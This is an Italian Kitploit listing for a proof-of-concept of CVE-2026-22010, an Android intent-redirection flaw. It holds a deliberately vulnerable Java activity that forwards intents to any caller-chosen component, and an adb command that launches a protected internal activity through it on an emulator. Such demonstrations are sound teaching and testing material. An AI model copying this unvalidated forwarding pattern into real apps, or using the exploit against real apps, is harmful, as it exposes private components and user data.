Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-22010-Android-Intent-Redirection-to-Exported-Component — Proof-of-concept per CVE-2026-22010 reindirizzamento degli intent Android: dimostra un'activity esportata che inoltra gli intent a componenti interni controllati dall'attaccante, aggirando i controlli dei permessi, con codice Java vulnerabile e passaggi di exploit adb. | Kitploit
Strumenti/GitHubGitHub/george0papasotiriou/cve-2026-22010-android-intent-redirection-to-exported-component
Sicurezza AndroidAnalisi delle VulnerabilitàExploitPentesting di App MobiliSicurezza MobileApprendimento e Formazione
GitHubgeorge0papasotiriou/cve-2026-22010-android-intent-redirection-to-exported-component

CVE-2026-22010-Android-Intent-Redirection-to-Exported-Component

Proof-of-concept per CVE-2026-22010 reindirizzamento degli intent Android: dimostra un'activity esportata che inoltra gli intent a componenti interni controllati dall'attaccante, aggirando i controlli dei permessi, con codice Java vulnerabile e passaggi di exploit adb.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
141 mese faNon ancora revisionato

CVE-2026-22010 – Reindirizzamento Android Intent verso Componente Esportato

Codice del programma (simulazione Java/Android)

root@kitploit:~
// VulnActivity.java - Exported activity that forwards intents
public class VulnActivity extends Activity {
    @Override
    protected void onCreate(Bundle b) {
        super.onCreate(b);
        Intent incoming = getIntent();
        // Retrieve target component from extras
        String targetPkg = incoming.getStringExtra("pkg");
        String targetCls = incoming.getStringExtra("cls");
        Intent forward = new Intent();
        forward.setClassName(targetPkg, targetCls);
        // Copy all extras from original intent
        forward.putExtras(incoming);
        startActivity(forward);
    }
}

CVE-2026-22010 – Reindirizzamento Android Intent verso Componente Esportato

Severity: High

Panoramica

Un'attività Android esportata reindirizza ciecamente gli intent in ingresso a un componente specificato negli extra dell'intent. Un attaccante può creare un intent che induce l'app ad avviare un'attività interna protetta con dati controllati dall'attaccante, aggirando i controlli sui permessi.

Dettagli della vulnerabilità

  • Tipo: Reindirizzamento Intent / Bypass dei permessi
  • Impatto: Accesso a componenti privati, furto di dati.
  • Causa principale: L'app non convalida il componente di destinazione (package e nome della classe) prima di inoltrare l'intent.

Dimostrazione dell'exploit

Distribuisci l'app vulnerabile su un emulatore Android. Invia un intent tramite adb:

root@kitploit:~
adb shell am start -n com.example/.VulnActivity --es pkg com.example.internal --es cls com.example.SecretActivity

L'attività interna viene avviata senza i permessi corretti.

Scarica lo strumento